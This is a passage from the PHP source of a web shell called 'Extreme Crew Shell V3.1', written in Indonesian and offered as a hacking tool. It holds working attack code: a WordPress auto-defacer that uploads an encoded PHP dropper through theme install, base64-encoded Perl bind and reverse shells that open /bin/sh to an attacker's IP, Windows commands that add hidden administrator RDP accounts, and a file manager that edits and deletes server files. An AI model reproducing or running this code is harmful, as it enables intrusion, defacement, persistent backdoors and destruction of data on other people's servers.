1782 $site2 = "$target/wp-admin/theme-install.php?upload";
1783 $b1 = anucurl($site2);
1784 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1785 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1786 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1787 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1788 $www = "m.php";
1789 $fp5 = fopen($www,"w");
1790 fputs($fp5,$upload3);
1791 $post2 = array(
1792 "_wpnonce" => "$anu2",
1793 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1794 "themezip" => "@$www",
1795 "install-theme-submit" => "Install Now",
1796 );
1797 $ch = curl_init("$target/wp-admin/update.php?ec=ciumakumz&action=upload-theme");
1798 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1799 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1800 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1801 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1802 curl_setopt($ch, CURLOPT_POST, 1);
1803 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1804 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1805 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1806 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1807 $data3 = curl_exec($ch);
1808 curl_close($ch);
1809 $y = date("Y");
1810 $m = date("m");
1811 $namafile = "id.php";
1812 $fpi = fopen($namafile,"w");
1813 fputs($fpi,$script);
1814 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1815 curl_setopt($ch6, CURLOPT_POST, true);
1816 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1817 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1818 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1819 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1820 curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1821 $postResult = curl_exec($ch6);
1822 curl_close($ch6);
1823 $as = "$target/k.php";
1824 $bs = anucurl($as);
1825 if(preg_match("#$script#is", $bs)) {
1826 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1827 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1828 } else {
1829 echo "[-] <font color='red'>gagal mepes...</font><br>";
1830 echo "[!!] coba aja manual: <br>";
1831 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1832 echo "[+] username: <font color=lime>$user</font><br>";
1833 echo "[+] password: <font color=lime>$pass</font><br><br>";
1834 }
1835 mysql_close($conn);
1836 }
1837 }
1838 } else {
1839 echo "<center><h1>WordPress Auto Deface V.2</h1>
1840 <form method='post'>
1841 Link Config: <br>
1842 <textarea name='link' placeholder='http://target.com/ec_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1843 <input type='text' name='script' height='10' size='50' placeholder='Hacked by Extreme Crew' required><br>
1844 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1845 </form></center>";
1846 }
1847} elseif($_GET['do'] == 'network') {
1848 echo "<form method='post'>
1849 <u>Bind Port:</u> <br>
1850 PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1851 <input type='submit' name='sub_bp' value='>>'>
1852 </form>
1853 <form method='post'>
1854 <u>Back Connect:</u> <br>
1855 Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>
1856 PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1857 <input type='submit' name='sub_bc' value='>>'>
1858 </form>";
1859 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1860 if(isset($_POST['sub_bp'])) {
1861 $f_bp = fopen("/tmp/bp.pl", "w");
1862 fwrite($f_bp, base64_decode($bind_port_p));
1863 fclose($f_bp);
1864
1865 $port = $_POST['port_bind'];
1866 $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1867 sleep(1);
1868 echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1869 unlink("/tmp/bp.pl");
1870 }
1871 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1872 if(isset($_POST['sub_bc'])) {
1873 $f_bc = fopen("/tmp/bc.pl", "w");
1874 fwrite($f_bc, base64_decode($bind_connect_p));
1875 fclose($f_bc);
1876
1877 $ipbc = $_POST['ip_bc'];
1878 $port = $_POST['port_bc'];
1879 $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1880 sleep(1);
1881 echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1882 unlink("/tmp/bc.pl");
1883 }
1884} elseif($_GET['do'] == 'tentang'){
1885 echo "<center>";
1886 echo "<h2>Extreme Crew Shell V3.1</h2>";
1887 echo "<p>Terima kasih buat kawan-kawan seperjuangan yang telah memberikan keperawa.. eh kepercayaan deng hehe</p>";
1888 echo "<p>Terima kasih buat IndoXploit & K2LL33D yang telah dengan senang hati memperbolehkan menambah atau mengurangi isi coding nya hehe";
1889 echo "<p>Terima kasih untuk kawan homo,sering colay,sering nangis,sering baper,dan sering seiring waktu hahaha</p>";
1890 echo "<p>Tanpa kalian saya tidak bisa menjadi seperti ini , terima kasih banyaklah pokoknya</p>";
1891 echo "<p>Mr.BucketHead - Khan007 - Mr.ApaPedulimu - Versailles48 - Mr.DreamX196 - l0c4lh3artz - Mr.AchanX48 - ./Mr.J - Sohai - HaXor Tr0j4n - ./51N1CH1 - Ndivic404 - FrozenBear404 - KidSZonk - Jje Incovers - Courageux - /Zeelous - fcod3x - McQueen_404 - Sadream - Chinax1337 - Mr.Akashi - Mr.LittleHaxor - zp3nzas - dll</p>";
1892} elseif($_GET['do'] == 'krdp_shell') {
1893 if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1894 if($_POST['create']) {
1895 $user = htmlspecialchars($_POST['user']);
1896 $pass = htmlspecialchars($_POST['pass']);
1897 if(preg_match("/$user/", exe("net user"))) {
1898 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
1899 } else {
1900 $add_user = exe("net user $user $pass /add");
1901 $add_groups1 = exe("net localgroup Administrators $user /add");
1902 $add_groups2 = exe("net localgroup Administrator $user /add");
1903 $add_groups3 = exe("net localgroup Administrateur $user /add");
1904 echo "[ RDP ACCOUNT INFO ]<br>
1905 ------------------------------<br>
1906 IP: <font color=lime>".$ip."</font><br>
1907 Username: <font color=lime>$user</font><br>
1908 Password: <font color=lime>$pass</font><br>
1909 ------------------------------<br><br>
1910 [ STATUS ]<br>
1911 ------------------------------<br>
1912 ";
1913 if($add_user) {
1914 echo "[add user] -> <font color='lime'>Berhasil</font><br>";
1915 } else {
1916 echo "[add user] -> <font color='red'>Gagal</font><br>";
1917 }
1918 if($add_groups1) {
1919 echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
1920 } elseif($add_groups2) {
1921 echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
1922 } elseif($add_groups3) {
1923 echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
1924 } else {
1925 echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1926 }
1927 echo "------------------------------<br>";
1928 }
1929 } elseif($_POST['s_opsi']) {
1930 $user = htmlspecialchars($_POST['r_user']);
1931 if($_POST['opsi'] == '1') {
1932 $cek = exe("net user $user");
1933 echo "Checking username <font color=lime>$user</font> ....... ";
1934 if(preg_match("/$user/", $cek)) {
1935 echo "[ <font color=lime>Sudah ada</font> ]<br>
1936 ------------------------------<br><br>
1937 <pre>$cek</pre>";
1938 } else {
1939 echo "[ <font color=red>belum ada</font> ]";
1940 }
1941 } elseif($_POST['opsi'] == '2') {
1942 $cek = exe("net user $user Extreme Crew");
1943 if(preg_match("/$user/", exe("net user"))) {
1944 echo "[change password: <font color=lime>Extreme Crew</font>] -> ";
1945 if($cek) {
1946 echo "<font color=lime>Berhasil</font>";
1947 } else {
1948 echo "<font color=red>Gagal</font>";
1949 }
1950 } else {
1951 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1952 }
1953 } elseif($_POST['opsi'] == '3') {
1954 $cek = exe("net user $user /DELETE");
1955 if(preg_match("/$user/", exe("net user"))) {
1956 echo "[remove user: <font color=lime>$user</font>] -> ";
1957 if($cek) {
1958 echo "<font color=lime>Berhasil</font>";
1959 } else {
1960 echo "<font color=red>Gagal</font>";
1961 }
1962 } else {
1963 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1964 }
1965 } else {
1966 //
1967 }
1968 } else {
1969 echo "-- Create RDP --<br>
1970 <form method='post'>
1971 <input type='text' name='user' placeholder='username' value='Extreme Crew' required>
1972 <input type='text' name='pass' placeholder='password' value='Extreme Crew' required>
1973 <input type='submit' name='create' value='>>'>
1974 </form>
1975 -- Option --<br>
1976 <form method='post'>
1977 <input type='text' name='r_user' placeholder='username' required>
1978 <select name='opsi'>
1979 <option value='1'>Cek Username</option>
1980 <option value='2'>Ubah Password</option>
1981 <option value='3'>Hapus Username</option>
1982 </select>
1983 <input type='submit' name='s_opsi' value='>>'>
1984 </form>
1985 ";
1986 }
1987 } else {
1988 echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1989 }
1990} elseif($_GET['act'] == 'newfile') {
1991 if($_POST['new_save_file']) {
1992 $newfile = htmlspecialchars($_POST['newfile']);
1993 $fopen = fopen($newfile, "a+");
1994 if($fopen) {
1995 $act = "<script>window.location='?ec=ciumakumz&act=edit&folder=".$dir."&file=".$_POST['newfile']."';</script>";
1996 } else {
1997 $act = "<font color=red>permission denied</font>";
1998 }
1999 }
2000 echo $act;
2001 echo "<form method='post'>
2002 Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
2003 <input type='submit' name='new_save_file' value='Submit'>
2004 </form>";
2005} elseif($_GET['act'] == 'newfolder') {
2006 if($_POST['new_save_folder']) {
2007 $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2008 if(!mkdir($new_folder)) {
2009 $act = "<font color=red>permission denied</font>";
2010 } else {
2011 $act = "<script>window.location='?ec=ciumakumz&folder=".$dir."';</script>";
2012 }
2013 }
2014 echo $act;
2015 echo "<form method='post'>
2016 Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2017 <input type='submit' name='new_save_folder' value='Submit'>
2018 </form>";
2019} elseif($_GET['act'] == 'rename_dir') {
2020 if($_POST['dir_rename']) {
2021 $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2022 if($dir_rename) {
2023 $act = "<script>window.location='?ec=ciumakumz&folder=".dirname($dir)."';</script>";
2024 } else {
2025 $act = "<font color=red>permission denied</font>";
2026 }
2027 echo "".$act."<br>";
2028 }
2029 echo "<form method='post'>
2030 <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2031 <input type='submit' name='dir_rename' value='rename'>
2032 </form>";
2033} elseif($_GET['act'] == 'delete_dir') {
2034 if(is_dir($dir)) {
2035 if(is_writable($dir)) {
2036 @rmdir($dir);
2037 @exe("rm -rf $dir");
2038 @exe("rmdir /s /q $dir");
2039 $act = "<script>window.location='?ec=ciumakumz&folder=".dirname($dir)."';</script>";
2040 } else {
2041 $act = "<font color=red>could not remove ".basename($dir)."</font>";
2042 }
2043 }
2044 echo $act;
2045} elseif($_GET['act'] == 'view') {
2046 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?ec=ciumakumz&act=view&folder=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?ec=ciumakumz&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?ec=ciumakumz&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?ec=ciumakumz&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?ec=ciumakumz&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2047 echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
2048} elseif($_GET['act'] == 'edit') {
2049 if($_POST['save']) {
2050 $save = file_put_contents($_GET['file'], $_POST['src']);
2051 if($save) {
2052 $act = "<font color=lime>Saved!</font>";
2053 } else {
2054 $act = "<font color=red>permission denied</font>";
2055 }
2056 echo "".$act."<br>";
2057 }
2058 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?ec=ciumakumz&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?ec=ciumakumz&act=edit&folder=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?ec=ciumakumz&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?ec=ciumakumz&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?ec=ciumakumz&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2059 echo "<form method='post'>
2060 <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2061 <input type='submit' value='Save' name='save' style='width: 500px;'>
2062 </form>";
2063} elseif($_GET['act'] == 'rename') {
2064 if($_POST['do_rename']) {
2065 $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2066 if($rename) {
2067 $act = "<script>window.location='?ec=ciumakumz&folder=".$dir."';</script>";
2068 } else {
2069 $act = "<font color=red>permission denied</font>";
2070 }
2071 echo "".$act."<br>";
2072 }
2073 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?ec=ciumakumz&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?ec=ciumakumz&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?ec=ciumakumz&act=rename&folder=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?ec=ciumakumz&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?ec=ciumakumz&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2074 echo "<form method='post'>
2075 <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2076 <input type='submit' name='do_rename' value='rename'>
2077 </form>";
2078} elseif($_GET['act'] == 'delete') {
2079 $delete = unlink($_GET['file']);
2080 if($delete) {
2081 $act = "<script>window.location='?ec=ciumakumz&folder=".$dir."';</script>";
2082 } else {
2083 $act = "<font color=red>permission denied</font>";
2084 }
2085 echo $act;
2086} else {
2087 if(is_dir($dir) === true) {
2088 if(!is_readable($dir)) {
2089 echo "<font color=red>can't open directory. ( not readable )</font>";
2090 } else {
2091 echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2092 <tr>
2093 <th class="th_home"><center>Name</center></th>
2094 <th class="th_home"><center>Type</center></th>
2095 <th class="th_home"><center>Size</center></th>
2096 <th class="th_home"><center>Last Modified</center></th>
2097 <th class="th_home"><center>Owner/Group</center></th>
2098 <th class="th_home"><center>Permission</center></th>
2099 <th class="th_home"><center>Action</center></th>
2100 </tr>';
2101 $scandir = scandir($dir);
2102 foreach($scandir as $dirx) {
2103 $dtype = filetype("$dir/$dirx");
2104 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2105 if(function_exists('posix_getpwuid')) {
2106 $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2107 $downer = $downer['name'];
2108 } else {
2109 //$downer = $uid;
2110 $downer = fileowner("$dir/$dirx");
2111 }
2112 if(function_exists('posix_getgrgid')) {
2113 $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2114 $dgrp = $dgrp['name'];
2115 } else {
2116 $dgrp = filegroup("$dir/$dirx");
2117 }
2118 if(!is_dir("$dir/$dirx")) continue;
2119 if($dirx === '..') {
2120 $href = "<a href='?ec=ciumakumz&folder=".dirname($dir)."'>$dirx</a>";
2121 } elseif($dirx === '.') {
2122 $href = "<a href='?ec=ciumakumz&folder=$dir'>$dirx</a>";
2123 } else {
2124 $href = "<a href='?ec=ciumakumz&folder=$dir/$dirx'>$dirx</a>";
2125 }
2126 if($dirx === '.' || $dirx === '..') {
2127 $act_dir = "<a href='?ec=ciumakumz&act=newfile&folder=$dir'>newfile</a> | <a href='?ec=ciumakumz&act=newfolder&folder=$dir'>newfolder</a>";
2128 } else {
2129 $act_dir = "<a href='?ec=ciumakumz&act=rename_dir&folder=$dir/$dirx'>rename</a> | <a href='?ec=ciumakumz&act=delete_dir&folder=$dir/$dirx'>delete</a>";
2130 }
2131 echo "<tr>";
2132 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2133 echo "<td class='td_home'><center>$dtype</center></td>";
2134 echo "<td class='td_home'><center>-</center></th></td>";
2135 echo "<td class='td_home'><center>$dtime</center></td>";
2136 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2137 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2138 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2139 echo "</tr>";
2140 }
2141 }
2142 } else {
2143 echo "<font color=red>can't open directory.</font>";
2144 }
2145 foreach($scandir as $file) {
2146 $ftype = filetype("$dir/$file");
2147 $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2148 $size = filesize("$dir/$file")/1024;
2149 $size = round($size,3);
2150 if(function_exists('posix_getpwuid')) {
2151 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2152 $fowner = $fowner['name'];
2153 } else {
2154 //$downer = $uid;
2155 $fowner = fileowner("$dir/$file");
2156 }
2157 if(function_exists('posix_getgrgid')) {
2158 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2159 $fgrp = $fgrp['name'];
2160 } else {
2161 $fgrp = filegroup("$dir/$file");
2162 }
2163 if($size > 1024) {
2164 $size = round($size/1024,2). 'MB';
2165 } else {
2166 $size = $size. 'KB';
2167 }
2168 if(!is_file("$dir/$file")) continue;
2169 echo "<tr>";
2170 echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?ec=ciumakumz&act=view&folder=$dir&file=$dir/$file'>$file</a></td>";
2171 echo "<td class='td_home'><center>$ftype</center></td>";
2172 echo "<td class='td_home'><center>$size</center></td>";
2173 echo "<td class='td_home'><center>$ftime</center></td>";
2174 echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2175 echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2176 echo "<td class='td_home' style='padding-left: 15px;'><a href='?ec=ciumakumz&act=edit&folder=$dir&file=$dir/$file'>edit</a> | <a href='?ec=ciumakumz&act=rename&folder=$dir&file=$dir/$file'>rename</a> | <a href='?ec=ciumakumz&act=delete&folder=$dir&file=$dir/$file'>delete</a> | <a href='?ec=ciumakumz&act=download&folder=$dir&file=$dir/$file'>download</a></td>";
2177 echo "</tr>";
2178 }
2179 echo "</table>";
2180 if(!is_readable($dir)) {
2181 //
2182 } else {
2183 echo "<hr>";
2184 }
2185 echo "<center>Copyright © ".date("Y")." - <a href='?ec=ciumakumz&folder=$dir&do=tentang'>Extreme Crew</a></center>";
2186}
2187echo "</html>";
2188}
2189?>